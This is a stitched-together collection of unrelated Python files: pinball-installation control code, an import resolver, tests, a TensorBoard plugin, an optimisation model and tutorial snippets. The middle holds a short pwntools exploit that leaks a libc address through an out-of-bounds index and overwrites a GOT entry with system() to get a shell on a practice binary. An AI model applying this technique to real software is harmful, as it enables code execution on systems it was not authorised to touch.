self.roll_inner_left = roll_inner_left
def request_button_switch_active(self, button_name, state_bool):
self.tb.publish(
topic="request_button_switch_active",
message=[button_name, state_bool],
destination=self.hostname
)
def set_button_switch_active(self,button_name, state_bool):
self.button_switch_active[button_name] = state_bool
def get_button_switch_active(self):
return self.button_switch_active[button_name]
def request_button_light_active(self, button_name, state_bool):
self.tb.publish(
topic="request_button_light_active",
message=[button_name, state_bool],
destination=self.hostname
)
def set_button_light_active(self,button_name, state_bool):
self.button_light_active[button_name] = state_bool
def get_button_light_active(self):
return self.button_light_active[button_name]
def cmd_gamestation_all_off(self, state_bool):
self.tb.publish(
topic="cmd_all_off",
message=state_bool,
destination=self.hostname
)
def cmd_playfield_lights(self, group, animation):
self.tb.publish(
topic="cmd_playfield_lights",
message=[group, animation],
destination=self.hostname
)
class Display(Host):
def __init__(self, hostname, tb):
Host.__init__(self, hostname)
self.hostname = hostname
self.tb = tb
self.phrases = ("juega","dinero","trueque","como","fue")
self.current_number = -1
self.current_phrase_key = ""
self.shift_registers_connected = False
self.current_score_name = ""
self.solenoids_present = [
False,
False,
False,
False,
False,
]
self.leds_present = {
"A":[
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
],
"B":[
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
],
"C":[
False,
False,
False,
False,
False,
False,
False,
False,
False,
False,
],
"words":[
False,
False,
False,
False,
False,
]
}
def request_score(self, score_name):
self.current_score_name = score_name
self.tb.publish(topic="cmd_play_score",message=score_name,destination=self.hostname)
def request_phrase(self, phrase_key):
self.current_phrase_key = phrase_key
self.tb.publish(topic="cmd_set_phrase",message=phrase_key,destination=self.hostname)
def set_phrase(self,phrase_key): # in case phrase is set through method othe than self.request_phrase
self.current_phrase_key = phrase_key
def get_phrase(self):
return self.current_phrase_key
def request_number(self, number):
self.current_number = number
self.tb.publish(topic="cmd_set_number",message=number,destination=self.hostname)
def set_number(self, number):
self.current_number = number
def get_number(self):
return self.current_number
def request_leds_present(self):
self.tb.publish(topic="request_display_leds_present", message="",destination="pinball1display")
def set_leds_present(self,leds_present):
self.leds_present = leds_present
def get_leds_present(self):
return self.leds_present
def request_solenoids_present(self):
self.tb.publish(topic="request_display_solenoids_present", message="",destination="pinball1display")
def set_solenoids_present(self,solenoids_present):
self.solenoids_present = solenoids_present
def get_solenoids_present(self):
return self.solenoids_present
def cmd_all_off(self):
self.tb.publish(topic="cmd_all_off",message="")
class Hosts():
def __init__(self, tb ):
self.tb = tb
self.controller = Controller("controller", tb)
self.carousel1 = Carousel("carousel1", tb)
self.carousel2 = Carousel("carousel2", tb)
self.carousel3 = Carousel("carousel3", tb)
self.carousel4 = Carousel("carousel4", tb)
self.carousel5 = Carousel("carousel5", tb)
self.carouselcenter = Carousel("carouselcenter", tb)
self.pinball1display = Display("pinball1display", tb)
self.pinball2display = Display("pinball2display", tb)
self.pinball3display = Display("pinball3display", tb)
self.pinball4display = Display("pinball4display", tb)
self.pinball5display = Display("pinball5display", tb)
self.pinball1game = Pinball("pinball1game", tb)
self.pinball2game = Pinball("pinball2game", tb)
self.pinball3game = Pinball("pinball3game", tb)
self.pinball4game = Pinball("pinball4game", tb)
self.pinball5game = Pinball("pinball5game", tb)
self.pinballmatrix = Matrix("pinballmatrix", tb)
self.hostnames = {
'controller':self.controller,
'carousel1':self.carousel1,
'carousel2':self.carousel2,
'carousel3':self.carousel3,
'carousel4':self.carousel4,
'carousel5':self.carousel5,
'carouselcenter':self.carouselcenter,
'pinball1display':self.pinball1display,
'pinball2display':self.pinball2display,
'pinball3display':self.pinball3display,
'pinball4display':self.pinball4display,
'pinball5display':self.pinball5display,
'pinball1game':self.pinball1game,
'pinball2game':self.pinball2game,
'pinball3game':self.pinball3game,
'pinball4game':self.pinball4game,
'pinball5game':self.pinball5game,
'pinballmatrix':self.pinballmatrix,
}
self.dispatch(b"response_computer_details", self.controller.get_computer_details(), "controller", "controller")
self.games_with_players = []
def clear_games_with_players(self):
self.games_with_players = []
def get_games_with_players(self):
return list(self.games_with_players)
def set_games_with_players(self,game_ordinal):
if game_ordinal not in self.games_with_players:
self.games_with_players.append(game_ordinal)
def get_all_host_connected(self):
for hostname in self.hostnames:
if hostname != "controller":
if self.hostnames[hostname].get_connected() == False:
return False
return True
def request_all_computer_details(self):
self.tb.publish("request_computer_details",True)
def get_all_computer_details_received(self):
absent_list = []
host_keys = self.hostnames.keys()
host_list = list(host_keys)
host_list.remove("controller")
for name in host_list:
if self.hostnames[name].get_computer_details_received() == False:
absent_list.append(name)
print("get_all_computer_details_received.absent_list",absent_list)
return len(absent_list) == 0
def get_all_current_sensor_present(self):
return True
def get_all_current_sensor_populated(self):
return True
def get_all_current_sensor_value(self):
# to do : add controller
names = ['pinball1display','pinball1game','pinball2game','pinball3game','pinball4game','pinball5game']
for name in names:
if self.hostnames[name].get_current_sensor_value() == False:
return False
return True
def get_all_current_sensor_nominal(self):
# to do : add controller
names = ['pinball1display','pinball1game','pinball2game','pinball3game','pinball4game','pinball5game']
for name in names:
#print("get_all_current_sensor_nominal",name, self.hostnames[name].get_current_sensor_nominal())
if self.hostnames[name].get_current_sensor_nominal() == False:
return False
return True
def get_all_non_nominal_states(self):
non_nominal_states = []
closed_loop_error = self.pinballmatrix.get_sdc2160_closed_loop_error()
closed_loop_error_list = []
for channel_value in enumerate(closed_loop_error):
channel, value = channel_value
if value > 100:
closed_loop_error_list.append([channel, value])
non_nominal_states.append(["pinballmatrix","sdc2160_closed_loop_error",channel, value])
# sdc: check channel faults
channel_faults = self.pinballmatrix.get_sdc2160_channel_faults()
channel_faults_list = []
for channel_name in channel_faults:
channel = channel_faults[channel_name]
if channel["temperature"] > 40:
channel_faults_list.append(["temperature",channel_name, channel["temperature"]])
non_nominal_states.append(["pinballmatrix",channel_name,"temperature", channel["temperature"]])
if channel["closed_loop_error"] > 100:
channel_faults_list.append("closed_loop_error", channel_name,channel["closed_loop_error"])
non_nominal_states.append(["pinballmatrix",channel_name,"closed_loop_error", channel["closed_loop_error"]])
if channel["stall_detection"] != False:
msg = ["stall_detection", channel_name,channel["stall_detection"]]
channel_faults_list.append(msg)
non_nominal_states.append(["pinballmatrix",channel_name,"stall_detection", channel["stall_detection"]])
if channel["motor_amps"] > 6:
channel_faults_list.append(["motor_amps",channel_name, channel["motor_amps"]])
non_nominal_states.append(["pinballmatrix",channel_name,"motor_amps", channel["motor_amps"]])
runtime_status_flags = channel["runtime_status_flags"]
for flag_name in runtime_status_flags:
if runtime_status_flags[flag_name] != 0:
channel_faults_list.append(flag_name, channel_name,runtime_status_flags[flag_name])
non_nominal_states.append(["pinballmatrix",channel_name,flag_name, runtime_status_flags[flag_name]])
# sdc: check controller faults
controller_errors_list = []
controller_faults_list = self.pinballmatrix.get_sdc2160_controller_faults()
controller_faults = {
"carousel1and2":controller_faults_list[0],
"carousel3and4":controller_faults_list[1],
"carousel5and6":controller_faults_list[2],
}
for controller_name in controller_faults:
controller = controller_faults[controller_name]
for fault_name in controller:
if controller[fault_name] != 0:
controller_errors_list.append([fault_name, controller_name,controller[fault_name]])
non_nominal_states.append(["pinballmatrix",controller_name,fault_name, controller[fault_name]])
computer_details_errors = []
for hostname in self.hostnames:
deets = self.hostnames[hostname].get_computer_details()
if deets["cpu_temp"] > 65:
computer_details_errors.append([hostname,"cpu_temp", deets["cpu_temp"]])
non_nominal_states.append([hostname,"computer_details","cpu_temp", deets["cpu_temp"]])
if deets["df"][0] < 500000000:
computer_details_errors.append([hostname,"df", deets["df"]])
non_nominal_states.append([hostname,"computer_details","df", deets["df"]])
# all: check current sensors
return non_nominal_states
def dispatch(self, topic, message, origin, destination):
if isinstance(topic, bytes):
topic = codecs.decode(topic, 'UTF-8')
if isinstance(message, bytes):
message = codecs.decode(message, 'UTF-8')
if isinstance(origin, bytes):
origin = codecs.decode(origin, 'UTF-8')
if isinstance(destination, bytes):
destination = codecs.decode(destination, 'UTF-8')
##### ROUTE MESSAGE TO METHOD #####
if topic == "connected" or topic == "respond_host_connected":
self.hostnames[origin].set_connected(message)
#if topic == "event_button_comienza": # unclear what state data should be stored here
# self.hostnames[origin].event_button_comienza(message)
#if topic == "event_button_derecha": # unclear what state data should be stored here
# self.hostnames[origin].event_button_derecha(message)
#if topic == "event_button_dinero":
# self.hostnames[origin].event_button_dinero(message)
#if topic == "event_button_izquierda": # unclear what state data should be stored here
# self.hostnames[origin].event_button_izquierda(message)
#if topic == "event_button_trueque":
# self.hostnames[origin].event_button_trueque(message)
if topic == "event_carousel_ball_detected":
self.hostnames[origin].set_carousel_ball_detected(message)
if topic == "event_carousel_error":
self.hostnames[origin].set_carousel_error(message)
if topic == "event_carousel_target_reached":
self.hostnames[origin].set_target_position_confirmed(message)
if topic == "event_destination_reached":
motor_name, reached, position, position_error = message
self.hostnames[origin].set_destination_reached(motor_name, reached, position, position_error)
if topic == "event_destination_stalled":
motor_name, stalled, position, position_error = message
self.hostnames[origin].set_destination_stalled(motor_name, stalled, position, position_error)
if topic == "event_destination_timeout":
motor_name, timeout, position, position_error = message
self.hostnames[origin].set_destination_timeout(motor_name, timeout, position, position_error)
#if topic == "event_gamestation_button": # unclear what state data should be stored here
# self.hostnames[origin].event_gamestation_button(message)
if topic == "event_left_stack_ball_present":
self.hostnames[origin].set_lefttube_value(message)
#if topic == "event_left_stack_motion_detected": # unclear what state data should be stored here
# self.hostnames[origin].set_left_stack_motion_detected(message)
#if topic == "event_pop_left": # unclear what state data should be stored here
# self.hostnames[origin].set_pop_left(message)
#if topic == "event_pop_middle": # unclear what state data should be stored here
# self.hostnames[origin].set_pop_middle(message)
#if topic == "event_pop_right": # unclear what state data should be stored here
# self.hostnames[origin].set_pop_right(message)
if topic == "event_right_stack_ball_present":
self.hostnames[origin].set_righttube_value(message)
#if topic == "event_right_stack_motion_detected": # unclear what state data should be stored here
# self.hostnames[origin].set_right_stack_motion_detected(message)
#if topic == "event_roll_inner_left":
# self.hostnames[origin].set_roll_inner_left(message)
#if topic == "event_roll_inner_right":
# self.hostnames[origin].set_roll_inner_right(message)
#if topic == "event_roll_outer_left":
# self.hostnames[origin].set_roll_outer_left(message)
#if topic == "event_roll_outer_right":
# self.hostnames[origin].set_roll_outer_right(message
#if topic == "event_slingshot_left":
# self.hostnames[origin].event_slingshot_left(message)
#if topic == "event_slingshot_right":
# self.hostnames[origin].event_slingshot_right(message)
#if topic == "event_spinner":
# self.hostnames[origin].set_spinner(message)
if topic == "event_trough_sensor":
self.hostnames[origin].set_troughsensor_value(message)
if topic == "response_amt203_absolute_position":
self.hostnames[origin].set_amt203_absolute_position(message)
if topic == "response_amt203_present":
self.hostnames[origin].set_amt203_present(message)
if topic == "response_amt203_zeroed":
self.hostnames[origin].set_amt203_zeroed(message)
if topic == "response_carousel_absolute":
self.hostnames[origin].set_amt203_absolute_position(message)
if topic == "response_carousel_ball_detected":
self.hostnames[origin].set_carousel_ball_detected(message)
if topic == "response_carousel_relative":
self.hostnames[origin].set_sdc2160_relative_position(message)
if topic == "response_computer_details":
self.hostnames[origin].set_computer_details(message)
if topic == "response_current_sensor_nominal":
self.hostnames[origin].set_current_sensor_nominal(message)
if topic == "response_current_sensor_present":
self.hostnames[origin].set_current_sensor_present(message)
if topic == "response_current_sensor_value":
self.hostnames[origin].set_current_sensor_value(message)
if topic == "response_high_power_enabled":
self.hostnames[origin].response_high_power_enabled(message)
if topic == "response_sdc2160_channel_faults":
self.hostnames[origin].set_sdc2160_channel_faults(message)
if topic == "response_sdc2160_closed_loop_error":
self.hostnames[origin].set_sdc2160_closed_loop_error(message)
if topic == "response_sdc2160_controller_faults":
self.hostnames[origin].set_sdc2160_controller_faults(message)
if topic == "response_sdc2160_present":
self.hostnames[origin].set_sdc2160_present(message)
if topic == "response_sdc2160_relative_position":
self.hostnames[origin].set_sdc2160_relative_position(message)
#if topic == "response_visual_tests":
# self.hostnames[origin].set_visual_tests(message)
##### AGGREGATED STATES #####
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Logic for resolving import paths."""
import logging
import os
from . import import_finder
from . import utils
class ImportException(ImportError):
def __init__(self, module_name):
super(ImportException, self).__init__(module_name)
self.module_name = module_name
class ResolvedFile(object):
def __init__(self, path, module_name):
self.path = path
self.module_name = module_name
def is_extension(self):
return self.path.endswith('.so')
@property
def package_name(self):
f, _ = os.path.splitext(self.path)
if f.endswith('__init__'):
return self.module_name
elif '.' in self.module_name:
return self.module_name[:self.module_name.rindex('.')]
else:
return None
@property
def short_path(self):
parts = self.path.split(os.path.sep)
n = self.module_name.count('.')
if parts[-1] == '__init__.py':
n += 1
parts = parts[-(n+1):]
return os.path.join(*parts)
class Direct(ResolvedFile):
"""Files added directly as arguments."""
def __init__(self, path, module_name=''):
# We do not necessarily have a module name for a directly added file.
super(Direct, self).__init__(path, module_name)
class Builtin(ResolvedFile):
"""Imports that are resolved via python's builtins."""
def is_extension(self):
return True
class System(ResolvedFile):
"""Imports that are resolved by python."""
pass
class Local(ResolvedFile):
"""Imports that are found in a local pythonpath."""
def __init__(self, path, module_name, fs):
super(Local, self).__init__(path, module_name)
self.fs = fs
def convert_to_path(name):
"""Converts ".module" to "./module", "..module" to "../module", etc."""
if name.startswith('.'):
remainder = name.lstrip('.')
dot_count = (len(name) - len(remainder))
prefix = '../'*(dot_count-1)
else:
remainder = name
dot_count = 0
prefix = ''
filename = prefix + os.path.join(*remainder.split('.'))
return (filename, dot_count)
def infer_module_name(filename, fspath):
"""Convert a python filename to a module relative to pythonpath."""
filename, _ = os.path.splitext(filename)
for f in fspath:
short_name = f.relative_path(filename)
if short_name:
# The module name for __init__.py files is the directory.
if short_name.endswith(os.path.sep + "__init__"):
short_name = short_name[:short_name.rfind(os.path.sep)]
return short_name.replace(os.path.sep, '.')
# We have not found filename relative to anywhere in pythonpath.
return ''
def get_absolute_name(package, relative_name):
"""Joins a package name and a relative name.
Args:
package: A dotted name, e.g. foo.bar.baz
relative_name: A dotted name with possibly some leading dots, e.g. ..x.y
Returns:
The relative name appended to the parent's package, after going up one
level for each leading dot.
e.g. foo.bar.baz + ..hello.world -> foo.hello.world
The unchanged relative_name if it does not start with a dot
or has too many leading dots.
"""
path = package.split('.') if package else []
name = relative_name.lstrip('.')
ndots = len(relative_name) - len(name)
if ndots > len(path):
return relative_name
absolute_path = path[:len(path) + 1 - ndots]
if name:
absolute_path.append(name)
return '.'.join(absolute_path)
class Resolver:
def __init__(self, fs_path, current_module):
self.fs_path = fs_path
self.current_module = current_module
self.current_directory = os.path.dirname(current_module.path)
def _find_file(self, fs, name):
init = os.path.join(name, '__init__.py')
py = name + '.py'
for x in [init, py]:
if fs.isfile(x):
return fs.refer_to(x)
return None
def resolve_import(self, item):
"""Simulate how Python resolves imports.
Returns the filename of the source file Python would load
when processing a statement like 'import name' in the module
we're currently under.
Args:
item: An instance of ImportItem
Returns:
A filename
Raises:
ImportException: If the module doesn't exist.
"""
name = item.name
# The last part in `from a.b.c import d` might be a symbol rather than a
# module, so we try a.b.c and a.b.c.d as names.
short_name = None
if item.is_from and not item.is_star:
if '.' in name.lstrip('.'):
# The name is something like `a.b.c`, so strip off `.c`.
rindex = name.rfind('.')
else:
# The name is something like `..c`, so strip off just `c`.
rindex = name.rfind('.') + 1
short_name = name[:rindex]
if import_finder.is_builtin(name):
filename = name + '.so'
return Builtin(filename, name)
filename, level = convert_to_path(name)
if level:
# This is a relative import; we need to resolve the filename
# relative to the importing file path.
filename = os.path.normpath(
os.path.join(self.current_directory, filename))
files = [(name, filename)]
if short_name:
short_filename = os.path.dirname(filename)
files.append((short_name, short_filename))
for module_name, path in files:
for fs in self.fs_path:
f = self._find_file(fs, path)
if not f or f == self.current_module.path:
# We cannot import a file from itself.
continue
if item.is_relative():
package_name = self.current_module.package_name
if package_name is None:
# Relative import in non-package
raise ImportException(name)
module_name = get_absolute_name(package_name, module_name)
if isinstance(self.current_module, System):
return System(f, module_name)
return Local(f, module_name, fs)
# If the module isn't found in the explicit pythonpath, see if python
# itself resolved it.
if item.source:
prefix, ext = os.path.splitext(item.source)
mod_name = name
# We need to check for importing a symbol here too.
if short_name:
mod = prefix.replace(os.path.sep, '.')
mod = utils.strip_suffix(mod, '.__init__')
if not mod.endswith(name) and mod.endswith(short_name):
mod_name = short_name
if ext == '.pyc':
pyfile = prefix + '.py'
if os.path.exists(pyfile):
return System(pyfile, mod_name)
elif not ext:
pyfile = os.path.join(prefix, "__init__.py")
if os.path.exists(pyfile):
return System(pyfile, mod_name)
return System(item.source, mod_name)
raise ImportException(name)
def resolve_all(self, import_items):
"""Resolves a list of imports.
Yields filenames.
"""
for import_item in import_items:
try:
yield self.resolve_import(import_item)
except ImportException as err:
logging.info('unknown module %s', err.module_name)
|
from pwn import *
context.terminal = ['tmux', 'splitw', '-h']
p = process('./example04')
gdb.attach(p)
def write(what, where):
p.sendlineafter('>', str(where))
p.sendlineafter('>', str(what))
def read(where):
p.sendlineafter('>', str(where))
return int(p.recvline())
binary = ELF('./example04')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
write(1, 1,)
atol_got = binary.symbols['got.atol']
numbers = binary.symbols['numbers']
index = str(int((atol_got - numbers) / 8))
print('index'. index)
atol_leak = read(index)
print('atol_leak', hex(atol_leak))
libc_base = atol_leak - libc.symbols['atol']
system_addr = libc_base + libc.symbols['system']
print('system', hex(system_addr))
write(system_addr, index)
p.interactive()
|
#!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
# Complete the makeAnagram function below.
def makeAnagram(a, b):
a_char_dict = defaultdict(int)
for char in a:
a_char_dict[char] += 1
counter = 0
for char in b:
if a_char_dict[char] != 0:
a_char_dict[char] -= 1
else:
counter += 1
for value in a_char_dict.values():
counter += value
return counter
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
a = input()
b = input()
res = makeAnagram(a, b)
fptr.write(str(res) + '\n')
fptr.close()
|
# Copyright (c) 2022 CNES
#
# All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
import pickle
import numpy as np
import pytest
from ... import core
def weighted_mom1(values, weights):
"""Return the weighted moment 1 of the values."""
return np.average(values, weights=weights)
def weighted_mom2(values, weights):
"""Return the weighted moment 2 of the values."""
average = weighted_mom1(values, weights)
return np.average((values - average)**2, weights=weights)
def weighted_mom3(values, weights):
"""Return the weighted moment 3 of the values."""
average = weighted_mom1(values, weights)
mom2 = weighted_mom2(values, weights)
return np.average(((values - average) / np.sqrt(mom2))**3, weights=weights)
def weighted_mom4(values, weights):
"""Return the weighted moment 4 of the values."""
average = weighted_mom1(values, weights)
mom2 = weighted_mom2(values, weights)
return np.average(((values - average) / np.sqrt(mom2))**4 - 3,
weights=weights)
def test_empty_container():
"""Test the calculation of statistics on an empty container."""
ds = core.DescriptiveStatisticsFloat64(np.array([]))
assert ds.count() == 0
assert np.isnan(ds.max())
assert np.isnan(ds.mean())
assert np.isnan(ds.min())
assert ds.sum_of_weights() == 0
assert ds.sum() == 0
assert np.isnan(ds.variance())
assert np.isnan(ds.skewness())
assert np.isnan(ds.kurtosis())
def test_flatten():
"""Test the calculation of statistics on a vector"""
values = np.random.random_sample(1000)
ds = core.DescriptiveStatisticsFloat64(values)
assert ds.count() == values.size
assert ds.max() == np.max(values)
assert ds.mean() == pytest.approx(np.mean(values))
assert ds.min() == np.min(values)
assert ds.sum_of_weights() == values.size
assert ds.sum() == pytest.approx(np.sum(values))
assert ds.variance() == pytest.approx(np.var(values))
assert ds.kurtosis() == pytest.approx(
weighted_mom4(values, np.ones(values.size)))
assert ds.skewness() == pytest.approx(
weighted_mom3(values, np.ones(values.size)))
def test_merge():
"""Test merging."""
values = np.random.random_sample(1000)
instance1 = core.DescriptiveStatisticsFloat64(values[:500])
instance2 = core.DescriptiveStatisticsFloat64(values[500:])
instance1 += instance2
del instance2
assert instance1.count() == values.size
assert instance1.max() == np.max(values)
assert instance1.mean() == pytest.approx(np.mean(values))
assert instance1.min() == np.min(values)
assert instance1.sum_of_weights() == values.size
assert instance1.sum() == pytest.approx(np.sum(values))
assert instance1.variance() == pytest.approx(np.var(values))
assert instance1.kurtosis() == pytest.approx(
weighted_mom4(values, np.ones(values.size)))
assert instance1.skewness() == pytest.approx(
weighted_mom3(values, np.ones(values.size)))
def test_pickle():
"""Test pickling."""
values = np.random.random_sample(1000)
ds = core.DescriptiveStatisticsFloat64(values)
other = pickle.loads(pickle.dumps(ds))
assert other.count() == ds.count()
assert other.max() == ds.max()
assert other.mean() == ds.mean()
assert other.min() == ds.min()
assert other.sum_of_weights() == ds.sum_of_weights()
assert other.sum() == ds.sum()
assert other.variance() == ds.variance()
assert other.skewness() == ds.skewness()
assert other.kurtosis() == ds.kurtosis()
def test_weighted():
"""Test weighted statistics."""
values = np.random.random_sample(1000)
weights = np.random.random_sample(1000)
ds = core.DescriptiveStatisticsFloat64(values, weights=weights)
assert ds.count() == values.size
assert ds.max() == np.max(values * weights)
assert ds.mean() == pytest.approx(weighted_mom1(values, weights))
assert ds.min() == np.min(values * weights)
assert ds.sum_of_weights() == pytest.approx(np.sum(weights))
assert ds.sum() == pytest.approx(np.sum(values * weights))
assert ds.variance() == pytest.approx(weighted_mom2(values, weights))
assert ds.kurtosis() == pytest.approx(weighted_mom4(values, weights))
assert ds.skewness() == pytest.approx(weighted_mom3(values, weights))
with pytest.raises(ValueError):
core.DescriptiveStatisticsFloat64(values, weights=weights[:100])
def test_axis():
"""Test axes along which the statistics are computed"""
values = np.random.random_sample((2, 3, 4, 5, 6, 7))
def check_axis(values, axis):
ds = core.DescriptiveStatisticsFloat64(values, axis=axis)
assert np.all(ds.count() == np.sum(values * 0 + 1, axis=axis))
assert np.all(ds.max() == np.max(values, axis=axis))
assert ds.mean() == pytest.approx(np.mean(values, axis=axis))
assert np.all(ds.min() == np.min(values, axis=axis))
assert np.all(ds.sum_of_weights() == np.sum(values * 0 + 1, axis=axis))
assert ds.sum() == pytest.approx(np.sum(values, axis=axis))
assert ds.variance() == pytest.approx(np.var(values, axis=axis))
check_axis(values, None)
check_axis(values, (1, ))
check_axis(values, (2, 3))
check_axis(values, (1, 3, 5))
with pytest.raises(ValueError):
core.DescriptiveStatisticsFloat64(values, axis=(12, )) # type: ignore
with pytest.raises(ValueError):
core.DescriptiveStatisticsFloat64(values, axis=(-1, )) # type: ignore
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The TensorBoard Graphs plugin."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from werkzeug import wrappers
from tensorflow.tensorboard.backend import http_util
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.plugins import base_plugin
_PLUGIN_PREFIX_ROUTE = 'graphs'
class GraphsPlugin(base_plugin.TBPlugin):
"""Graphs Plugin for TensorBoard."""
plugin_name = _PLUGIN_PREFIX_ROUTE
def get_plugin_apps(self, multiplexer, unused_logdir):
self._multiplexer = multiplexer
return {
'/graph': self.graph_route,
'/runs': self.runs_route,
'/run_metadata': self.run_metadata_route,
'/run_metadata_tags': self.run_metadata_tags_route,
}
def is_active(self):
"""The graphs plugin is active iff any run has a graph."""
return bool(self.index_impl())
def index_impl(self):
"""Returns a list of all runs that have a graph."""
return [run_name
for (run_name, run_data) in self._multiplexer.Runs().items()
if run_data.get(event_accumulator.GRAPH)]
def run_metadata_index_impl(self):
"""Returns a run-to-tag mapping for metadata."""
return {
run_name: run_data[event_accumulator.RUN_METADATA]
for (run_name, run_data) in self._multiplexer.Runs().items()
if event_accumulator.RUN_METADATA in run_data
}
def graph_impl(self, run, limit_attr_size=None, large_attrs_key=None):
"""Result of the form `(body, mime_type)`, or `None` if no graph exists."""
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return None
# This next line might raise a ValueError if the limit parameters
# are invalid (size is negative, size present but key absent, etc.).
process_graph.prepare_graph_for_ui(graph, limit_attr_size, large_attrs_key)
return (str(graph), 'text/x-protobuf') # pbtxt
def run_metadata_impl(self, run, tag):
"""Result of the form `(body, mime_type)`, or `None` if no data exists."""
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return None
return (str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def runs_route(self, request):
index = self.index_impl()
return http_util.Respond(request, index, 'application/json')
@wrappers.Request.application
def run_metadata_tags_route(self, request):
index = self.run_metadata_index_impl()
return http_util.Respond(request, index, 'application/json')
@wrappers.Request.application
def graph_route(self, request):
"""Given a single run, return the graph definition in protobuf format."""
run = request.args.get('run')
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be an integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
result = self.graph_impl(run, limit_attr_size, large_attrs_key)
except ValueError as e:
return http_util.Respond(request, e.message, 'text/plain', code=400)
else:
if result is not None:
(body, mime_type) = result # pylint: disable=unpacking-non-sequence
return http_util.Respond(request, body, mime_type)
else:
return http_util.Respond(request, '404 Not Found', 'text/plain',
code=404)
@wrappers.Request.application
def run_metadata_route(self, request):
"""Given a tag and a run, return the session.run() metadata."""
tag = request.args.get('tag')
run = request.args.get('run')
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
result = self.run_metadata_impl(run, tag)
if result is not None:
(body, mime_type) = result # pylint: disable=unpacking-non-sequence
return http_util.Respond(request, body, mime_type)
else:
return http_util.Respond(request, '404 Not Found', 'text/plain',
code=404)
|
# pylint: skip-file
import pyomo.environ as aml
import math
import operator as op
from functools import reduce
def get_pyomo_model(*args, **kwargs):
m = aml.ConcreteModel()
m.I = range(5)
def init_x(m, i):
return [-1.717142, 1.595708, 1.827248, -0.7636429, -0.7636435][i]
m.x = aml.Var(m.I, initialize=init_x)
m.cons0 = aml.Constraint(expr=sum(m.x[i]**2 for i in m.I) == 10)
m.cons1 = aml.Constraint(expr=m.x[1]*m.x[2] - 5*m.x[3]*m.x[4] == 0)
m.cons2 = aml.Constraint(expr=m.x[0]**3 + m.x[1]**3 == -1)
m.obj = aml.Objective(expr=reduce(op.mul, [m.x[i] for i in m.I], 1.0))
return m
|
import datetime
import yaml
class FileClass:
"""
Класс для работы с файлом file_name, который передаётся в конструктр из main
- Записывает данные в файл
- Читает данные из файла
"""
def __init__(self, file_name, method=1):
self.file_name = file_name
if method == 2:
self.read_file()
def set_file(self, content):
with open(self.file_name, "w") as outfile:
yaml.safe_dump(content, outfile, allow_unicode=True)
def read_file(self):
with open(self.file_name, "r") as outfile:
self.content = yaml.safe_load(outfile)
def get_text(self):
return self.content
class UniversalClass:
@staticmethod
def get_train_time(*time_ranges):
"""
Метод для вычисления времени прибытия поезда
Необходим для проверки на то, успевает ли человек на свой поезд
"""
out_list = []
for time_range in time_ranges:
time = time_range[0]
begin_time = time_range[1]
train_begin_time = datetime.datetime.strptime(begin_time, "%d.%m.%Y %H:%M")
train_arrive_time = train_begin_time + datetime.timedelta(minutes=time)
out_list.append((train_begin_time, train_arrive_time))
return out_list
@staticmethod
def detect_station_waiting_time(station_name, all_wait_list):
"""
Определяем, есть ли станция в словаре ожидания
- Если есть такая станция, то отдаём True и время ожидания
- Если нет, то False и None
"""
for way in all_wait_list["ways"]:
if station_name == way["point"]:
return True, way["time"]
return False, None
@staticmethod
def get_ways_string(ways_list):
"""
Отдаёт единую строку путей для красивого вывода в result_outputer
"""
buf_list = []
for e in ways_list:
buf_list.extend([e["way_from"], e["way_to"]])
results = []
for item in buf_list:
if results and item == results[-1]:
results.pop()
results.append(item)
return " -> ".join(results)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 地址:https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832
# Python基础
print('包含中文的str')
# Python提供了ord()函数获取字符的整数表示,chr()函数把编码转换为对应的字符
print(ord('A'))
print(chr(66))
print(chr(25191))
# 编码
print('ABC'.encode('ascii'))
print('中文'.encode('utf-8'))
print(b'ABC'.decode('ascii'))
print(b'\xe4\xb8\xad\xe6\x96\x87'.decode('utf-8'))
# list 和 tuple
classmates = ['Michael', 'Bob', 'Tracy']
print(classmates)
print(len(classmates)) # 长度
print(classmates[0])
print(classmates[-1])
classmates.append('Adam') # 追加
print(classmates)
classmates.insert(1, 'Jack') # 插入到指定位置
print(classmates)
classmates.pop(1) # 移除指定位置
print(classmates)
classmates[1] = 'Sarah'
print('classmates =', classmates)
# 不同类型的list
L = ['Apple', 123, True]
s = ['python', 'java', ['asp', 'php'], 'scheme']
L1 = []
# 元组tuple
t = (1, 2)
print(t)
t1 = (1, ) # 只有1个元素的tuple定义时必须加一个逗号,,来消除歧义
print(t1)
# 可变tuple
